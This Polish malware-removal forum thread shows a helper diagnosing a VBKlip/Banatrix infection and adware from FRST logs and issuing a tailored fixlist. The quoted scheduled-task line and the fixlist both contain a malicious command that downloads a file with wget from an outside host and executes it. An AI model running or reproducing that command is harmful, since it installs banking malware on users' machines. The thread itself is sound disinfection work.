Skocz do zawartości
WAŻNE - Użytkownicy uprawnieni do pomocy
WAŻNE - Zakładanie tematu: obowiązkowe logi
Nadchodzące zmiany w logowaniu

Czyszczenie komputera

xantyr

Przez xantyr
w Dział pomocy doraźnej

Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
picasso

picasso

Opublikowano
Opublikowano

Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Czy przypadkiem nie chodzi o folder SkypEmoticons? Taki widać w logu, jest to adware a nie część Skype. Natomiast w logach widać też inne odpadki adware oraz czynną infekcję - wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań:

 

Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp 
 
 

Przeprowadź następujące operacje:
 

1. Otwórz Notatnik i wklej w nim:
 


CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction 
Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi
Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp 
Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7
Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
C:\Program Files\Probit Software
C:\Program Files\unisaLees
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\ProgramData\17691939238860040889
C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol
C:\ProgramData\APN
C:\ProgramData\EpicScale
C:\Users\Maciej\AppData\Roaming\Easeware
C:\Users\Maciej\AppData\Roaming\SkypEmoticons
EmptyTemp:
 


Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.
 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.
 

2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.
Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano

Poprzednie zadania pomyślnie wykonane i w ostatnim raporcie FRST nie widać oznak infekcji. Na wszelki wypadek podaj jednak nowe raporty FRST (główny + Addition).

 

To typ połączeń "Inbound", czyli przychodzące, co nie oznacza jeszcze infekcji w systemie tylko potencjalnie jej próbę / atak. Program blokuje i OK. Pytania:

- Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno?

- W Skype: Narzędzia > Opcje > Zaawansowane > Zarządzaj dostępem innych programów do Skype > co widzisz na liście Kontroli dostępu API?

 

IP 213.55.112.88 jest klasyfikowane jako "etiopskie": KLIK. IP pobierane u Ciebie z routera również jest z puli 213.x.x.x, ono jednak wskazuje adres polskiego providera: KLIK

 

Tcpip\Parameters: [DhcpNameServer] 213.172.186.4 8.8.8.8

 

Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4. Podaj jeszcze odczyt z tego skanera: KLIK.

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano

1. W nowych raportach FRST nic nie widać, toteż kończymy w zakresie czyszczenia. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK.

 

2. Na wszelki wypadek wykonaj jeszcze to:

 

Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4.

Nie odpowiedziałeś mi na pytanie:

 

Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno?

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...